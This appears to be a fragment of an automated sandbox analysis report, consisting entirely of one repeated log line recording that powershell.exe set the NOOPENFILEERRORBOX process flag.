                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
